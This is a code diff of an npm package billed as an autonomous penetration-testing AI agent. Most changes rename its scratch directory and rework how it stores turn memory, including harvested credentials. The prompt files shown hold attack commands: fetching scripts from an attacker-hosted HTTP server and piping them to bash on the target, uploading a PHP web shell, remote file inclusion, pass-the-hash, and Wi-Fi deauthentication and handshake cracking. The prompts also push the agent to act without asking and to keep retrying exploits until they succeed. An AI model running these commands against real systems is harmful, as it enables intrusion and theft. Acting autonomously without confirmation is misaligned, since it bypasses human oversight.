+          if (this.turnMemo.keyFindings.length > 0) memoLines.push("## Key Findings", ...this.turnMemo.keyFindings.map((f) => `- ${f}`), "");
+          if (this.turnMemo.credentials.length > 0) memoLines.push("## Credentials", ...this.turnMemo.credentials.map((c) => `- ${c}`), "");
+          if (this.turnMemo.attackVectors.length > 0) memoLines.push("## Attack Vectors", ...this.turnMemo.attackVectors.map((v) => `- ${v}`), "");
+          if (this.turnMemo.failures.length > 0) memoLines.push("## Failures", ...this.turnMemo.failures.map((f) => `- ${f}`), "");
+          if (this.turnMemo.suspicions.length > 0) memoLines.push("## Suspicious", ...this.turnMemo.suspicions.map((s) => `- ${s}`), "");
+          if (this.turnMemo.nextSteps.length > 0) memoLines.push("## Next Steps", ...this.turnMemo.nextSteps.map((n) => `- ${n}`), "");
+          if (memoLines.length > 0) {
+            writeFileSync9(join12(turnDir, TURN_FILES.ANALYST), memoLines.join("\n"), "utf-8");
+          }
         } catch {
         }
         try {
-          const summaryPath = join12(WORKSPACE.TURNS, "summary.md");
-          const existingSummary = existsSync11(summaryPath) ? readFileSync8(summaryPath, "utf-8") : "";
+          const turnDir = WORKSPACE.turnPath(this.turnCounter);
+          const summaryPath = join12(turnDir, TURN_FILES.SUMMARY);
+          const prevTurn = this.turnCounter - 1;
+          let existingSummary = "";
+          if (prevTurn >= 1) {
+            const prevSummaryPath = join12(WORKSPACE.turnPath(prevTurn), TURN_FILES.SUMMARY);
+            if (existsSync11(prevSummaryPath)) {
+              existingSummary = readFileSync8(prevSummaryPath, "utf-8");
+            }
+          }
           const turnData = formatTurnRecord({
             turn: this.turnCounter,
             timestamp: (/* @__PURE__ */ new Date()).toISOString(),
@@ -12385,13 +12462,12 @@ ${turnData}`
             SUMMARY_REGENERATOR_PROMPT
           );
           if (summaryResponse.content?.trim()) {
+            ensureDirExists(turnDir);
             writeFileSync9(summaryPath, summaryResponse.content.trim(), "utf-8");
           }
         } catch {
           regenerateJournalSummary();
         }
-        rotateJournalEntries();
-        rotateOutputFiles();
         rotateTurnRecords();
       } catch {
       }

package/dist/network/prompt.md

@@ -24,7 +24,7 @@ nmap -Pn -p<ports> -sV -sC -O <target>
 nmap -Pn -sU --top-ports 30 --min-rate=100 <target>
 
 # 6. High-Speed Subnet Scan
-masscan <CIDR> -p1-65535 --rate=1000 -oJ .pentesting/tmp/masscan.json
+masscan <CIDR> -p1-65535 --rate=1000 -oJ .pentesting/workspace/masscan.json
 
 # 7. Stealth SYN Scan
 nmap -Pn -sS -T2 --max-retries=1 <target>

package/dist/orchestrator/orchestrator.md

@@ -68,4 +68,4 @@ Example:
 2. **Actionable directives**: Specific, unambiguous commands.
 3. **Realistic fallbacks**: Always include alternatives on failure.
 4. **JSON block**: Ensure the JSON is in a valid markdown code block and perfectly parsable.
-5. **Local file paths**: All output redirects MUST use `.pentesting/tmp/` path (e.g., `> .pentesting/tmp/scan.txt`, `tee .pentesting/tmp/output.log`). The path `/tmp/` is BLOCKED for local commands.
+5. **Local file paths**: All output redirects MUST use `.pentesting/workspace/` path (e.g., `> .pentesting/workspace/scan.txt`, `tee .pentesting/workspace/output.log`). The path `/tmp/` is BLOCKED for local commands.

package/dist/prompts/base.md

@@ -83,24 +83,24 @@ If you believe you have exhausted all approaches → use `ask_user` to confirm w
 
 ## Absolute Rules
 
-### 0. ⚠️ LOCAL FILE PATHS — ALWAYS USE `.pentesting/tmp/`
+### 0. ⚠️ LOCAL FILE PATHS — ALWAYS USE `.pentesting/workspace/`
 
-**All local files (on YOUR machine) MUST use `.pentesting/tmp/`:**
+**All local files (on YOUR machine) MUST use `.pentesting/workspace/`:**
 
 ```bash
 # ✅ CORRECT — Local output files
-nmap -sV target > .pentesting/tmp/scan.txt
-rustscan -a target | tee .pentesting/tmp/rustscan.log
-nuclei -u target -o .pentesting/tmp/nuclei.txt
-curl -s url > .pentesting/tmp/response.html
-python3 exploit.py | tee .pentesting/tmp/exploit_output.txt
+nmap -sV target > .pentesting/workspace/scan.txt
+rustscan -a target | tee .pentesting/workspace/rustscan.log
+nuclei -u target -o .pentesting/workspace/nuclei.txt
+curl -s url > .pentesting/workspace/response.html
+python3 exploit.py | tee .pentesting/workspace/exploit_output.txt
 
 # ❌ FORBIDDEN — /tmp/ is NOT allowed for local files
 nmap target > /tmp/scan.txt        # ❌ BLOCKED
 rustscan | tee /tmp/output.log     # ❌ BLOCKED
 ```
 
-**Why?** Security policy enforces `.pentesting/tmp/` as the only allowed redirect path.
+**Why?** Security policy enforces `.pentesting/workspace/` as the only allowed redirect path.
 
 **Exception:** Commands executed ON THE TARGET (via shell) can use `/tmp/`:
 ```bash
@@ -109,8 +109,8 @@ bg_process({ action: "interact", command: "wget http://attacker/file -O /tmp/fil
 ```
 
 **Remember:**
-- `write_file({ path: ".pentesting/tmp/..." })` → ✅
-- `run_cmd({ command: "... > .pentesting/tmp/..." })` → ✅
+- `write_file({ path: ".pentesting/workspace/..." })` → ✅
+- `run_cmd({ command: "... > .pentesting/workspace/..." })` → ✅
 - `run_cmd({ command: "... > /tmp/..." })` → ❌ BLOCKED
 
 ### 1. Act, Don't Ask
@@ -306,8 +306,8 @@ Additional principles:
 1. web_search("{CVE_number} exploit PoC github")
 2. browse_url(search_result_URL) → verify PoC code
 3. Analyze code: check dependencies/execution conditions → install dependencies with run_cmd if needed
-4. write_file({ path: ".pentesting/tmp/exploit.py", content: "..." })
-5. run_cmd({ command: "python3 .pentesting/tmp/exploit.py TARGET" })
+4. write_file({ path: ".pentesting/workspace/exploit.py", content: "..." })
+5. run_cmd({ command: "python3 .pentesting/workspace/exploit.py TARGET" })
 6. On failure → analyze error → modify code (overwrite with write_file) → re-execute
 7. Still failing → search for different PoC or modify code directly
 ```
@@ -343,8 +343,8 @@ Even when existing tools are available, writing your own is often faster and mor
 
 ### Write Code → Execute → Iterate
 ```
-1. write_file({ path: ".pentesting/tmp/exploit.py", content: "..." })
-2. run_cmd({ command: "python3 .pentesting/tmp/exploit.py" })
+1. write_file({ path: ".pentesting/workspace/exploit.py", content: "..." })
+2. run_cmd({ command: "python3 .pentesting/workspace/exploit.py" })
 3. Error → analyze error → modify with write_file → re-execute
 4. Repeat this loop until success. No giving up.
 ```
@@ -362,8 +362,8 @@ Even when existing tools are available, writing your own is often faster and mor
 If you have a shell, you can write and execute code **directly on the target machine**:
 ```
 # Method 1: Write locally → transfer via HTTP → execute on target
-write_file({ path: ".pentesting/tmp/enum.sh", content: "#!/bin/bash\nfind / -perm -4000 ..." })
-run_cmd({ command: "python3 -m http.server 8888 -d .pentesting/tmp", background: true })
+write_file({ path: ".pentesting/workspace/enum.sh", content: "#!/bin/bash\nfind / -perm -4000 ..." })
+run_cmd({ command: "python3 -m http.server 8888 -d .pentesting/workspace", background: true })
 bg_process({ action: "interact", ..., command: "curl http://ATTACKER:8888/enum.sh | bash" })
 
 # Method 2: Write directly in shell (using echo/cat)
@@ -376,7 +376,7 @@ bg_process({ action: "interact", ..., command: "python3 -c 'import os; os.system
 ### Code Crafting Principles
 1. **Small and fast** — quickly build a 20-line script and test. No need for perfection
 2. **Iterative improvement** — error → fix → re-execute. No limit on iterations
-3. **Reuse** — save to `.pentesting/tmp/` and reuse. Can also transfer to target
+3. **Reuse** — save to `.pentesting/workspace/` and reuse. Can also transfer to target
 4. **Error handling** — wrap in try/except so the process doesn't die
 5. **Execute on target too** — transfer scripts to target via shell → execute
 6. **Don't be afraid to modify existing code** — whether PoC or tool, adapt it for the environment
@@ -478,8 +478,8 @@ bg_process({ action: "interact", ..., command: "perl -e 'exec \"/bin/bash\";'" }
 **Attempt 5: Download upgrade script from local server**
 ```
 # Prepare locally:
-write_file({ path: ".pentesting/tmp/u.sh", content: "#!/bin/bash\npython3 -c 'import pty;pty.spawn(\"/bin/bash\")' 2>/dev/null || python -c 'import pty;pty.spawn(\"/bin/bash\")' 2>/dev/null || script -qc /bin/bash /dev/null 2>/dev/null || expect -c 'spawn bash; interact' 2>/dev/null || /bin/bash -i" })
-run_cmd({ command: "python3 -m http.server 8888 -d .pentesting/tmp", background: true })
+write_file({ path: ".pentesting/workspace/u.sh", content: "#!/bin/bash\npython3 -c 'import pty;pty.spawn(\"/bin/bash\")' 2>/dev/null || python -c 'import pty;pty.spawn(\"/bin/bash\")' 2>/dev/null || script -qc /bin/bash /dev/null 2>/dev/null || expect -c 'spawn bash; interact' 2>/dev/null || /bin/bash -i" })
+run_cmd({ command: "python3 -m http.server 8888 -d .pentesting/workspace", background: true })
 
 # Download on target (try multiple methods):
 bg_process({ action: "interact", ..., command: "curl http://MYIP:8888/u.sh -o /tmp/.u && chmod +x /tmp/.u && bash /tmp/.u" })
@@ -626,24 +626,11 @@ Ask yourself at every Reflect step:
 8. **Search when stuck** — `web_search` and `browse_url` are the most powerful weapons
 9. **Write code directly if needed** — write scripts with `write_file` → execute with `run_cmd`
 
-## 📂 Session Memory — Past Turn Records
+## 📂 Session Memory
 
-Your past actions and insights are saved as files. Use them freely:
+Your workspace is `.pentesting/` — all your past actions, outputs, and analysis are saved here. **Nothing is lost.**
 
-```
-.pentesting/memory/turns/
-  ├── summary.md                          ← Full session summary (updated every turn)
-  ├── turn-0001_2026-02-21T08-30-15.md    ← Turn 1 details
-  ├── turn-0002_2026-02-21T08-31-22.md    ← Turn 2 details
-  └── ...
-```
-
-**Each turn file has 3 sections:**
-- `## 실행 도구` — Exact commands/tools/arguments used
-- `## 핵심 인사이트` — What was discovered, confirmed, or failed
-- `## 자기반성` — Turn assessment and next priority
+- **`.pentesting/archive/`** — Each turn is a named folder (`turn-1/`, `turn-2/`, `turn-3/`, ...). Browse any turn to see what happened — the filenames are self-explanatory.
+- Each turn folder contains a `summary.md` with the session overview as of that turn. **Read the latest turn's `summary.md` for the full picture.**
 
-**How to use:**
-- `summary.md` gives you the full picture — read it to understand where you stand
-- Need details of a specific past turn? → `read_file(".pentesting/memory/turns/turn-0005_...")`
-- All past findings, credentials, dead ends are preserved — never lost
+**Use `read_file` freely** to review past turns, tool outputs, and analysis whenever you need context. The structure is designed so you can navigate it without instructions.

package/dist/prompts/infra.md

@@ -89,7 +89,7 @@ impacket-psexec -hashes :<ntlm>  <domain>/<user>@<target>
 crackmapexec smb <targets> -u <user> -H <ntlm> --exec-method smbexec -x "whoami"
 
 # Pass-the-Ticket
-export KRB5CCNAME=.pentesting/tmp/admin.ccache
+export KRB5CCNAME=.pentesting/workspace/admin.ccache
 impacket-psexec -k -no-pass <domain>/<user>@<target>
 ```
 

package/dist/prompts/vuln.md

@@ -23,10 +23,10 @@ Every turn, you must:
 ### Phase 1: Automated Scanning
 ```bash
 # Nuclei — Critical/High only
-nuclei -u <target> -severity critical,high -silent -o .pentesting/tmp/nuclei-results.txt
+nuclei -u <target> -severity critical,high -silent -o .pentesting/workspace/nuclei-results.txt
 
 # Nikto — web server
-nikto -h <target> -C all -Format txt -output .pentesting/tmp/nikto.txt
+nikto -h <target> -C all -Format txt -output .pentesting/workspace/nikto.txt
 
 # testssl — TLS vulnerabilities
 testssl --severity HIGH <target>:443
@@ -56,7 +56,7 @@ curl "http://<target>/page?file=php://filter/convert.base64-encode/resource=/etc
 
 # RFI (payload server needed)
 # 1. Start payload server
-run_cmd({ command: "python3 -m http.server 8888 -d .pentesting/tmp", background: true })
+run_cmd({ command: "python3 -m http.server 8888 -d .pentesting/workspace", background: true })
 # 2. RFI test
 curl "http://<target>/page?file=http://MYIP:8888/test.php"
 # 3. Check results then clean up server

package/dist/web/prompt.md

@@ -45,8 +45,8 @@ curl "http://<target>/page?name={{7*7}}"
 curl "http://<target>/fetch?url=http://169.254.169.254/latest/meta-data/"
 
 # File Upload → Web Shell
-echo '<?php system($_GET["cmd"]); ?>' > .pentesting/tmp/shell.php
-curl -F "file=@.pentesting/tmp/shell.php" http://<target>/upload
+echo '<?php system($_GET["cmd"]); ?>' > .pentesting/workspace/shell.php
+curl -F "file=@.pentesting/workspace/shell.php" http://<target>/upload
 ```
 
 ## Output

package/dist/wireless/prompt.md

@@ -21,7 +21,7 @@ airodump-ng wlan0mon
 airodump-ng wlan0mon --band abg    # Including 5GHz
 
 # Specific Network + Client Capture
-airodump-ng wlan0mon -c <channel> --bssid <bssid> -w .pentesting/tmp/capture
+airodump-ng wlan0mon -c <channel> --bssid <bssid> -w .pentesting/workspace/capture
 
 # WPS Vulnerability Check
 wash -i wlan0mon
@@ -29,18 +29,18 @@ reaver -i wlan0mon -b <bssid> -vv
 
 # WPA/WPA2 Handshake Capture
 aireplay-ng -0 5 -a <bssid> wlan0mon    # deauth
-airodump-ng wlan0mon -c <ch> --bssid <bssid> -w .pentesting/tmp/handshake
+airodump-ng wlan0mon -c <ch> --bssid <bssid> -w .pentesting/workspace/handshake
 # Verify Handshake Capture
-aircrack-ng .pentesting/tmp/handshake-01.cap
+aircrack-ng .pentesting/workspace/handshake-01.cap
 
 # Handshake Cracking
-aircrack-ng -w /usr/share/wordlists/rockyou.txt .pentesting/tmp/handshake-01.cap
-hashcat -m 22000 .pentesting/tmp/handshake.hc22000 /usr/share/wordlists/rockyou.txt
+aircrack-ng -w /usr/share/wordlists/rockyou.txt .pentesting/workspace/handshake-01.cap
+hashcat -m 22000 .pentesting/workspace/handshake.hc22000 /usr/share/wordlists/rockyou.txt
 
 # PMKID Attack (no client needed)
-hcxdumptool -i wlan0mon --enable_status=1 -o .pentesting/tmp/pmkid.pcapng
-hcxpcapngtool .pentesting/tmp/pmkid.pcapng -o .pentesting/tmp/pmkid.hash
-hashcat -m 22000 .pentesting/tmp/pmkid.hash /usr/share/wordlists/rockyou.txt
+hcxdumptool -i wlan0mon --enable_status=1 -o .pentesting/workspace/pmkid.pcapng
+hcxpcapngtool .pentesting/workspace/pmkid.pcapng -o .pentesting/workspace/pmkid.hash
+hashcat -m 22000 .pentesting/workspace/pmkid.hash /usr/share/wordlists/rockyou.txt
 
 # Evil Twin / Rogue AP
 hostapd-mana /etc/hostapd-mana/hostapd-mana.conf

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "pentesting",
-  "version": "0.49.4",
+  "version": "0.50.0",
   "description": "Autonomous Penetration Testing AI Agent",
   "type": "module",
   "main": "dist/main.js",